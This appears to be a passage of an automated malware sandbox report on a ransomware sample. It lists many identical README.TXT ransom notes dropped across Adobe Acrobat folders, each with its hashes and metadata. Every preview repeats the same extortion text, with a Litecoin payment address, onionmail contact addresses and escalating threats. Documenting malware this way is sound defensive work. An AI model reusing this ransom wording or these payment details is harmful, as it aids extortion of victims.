                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\he-il\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
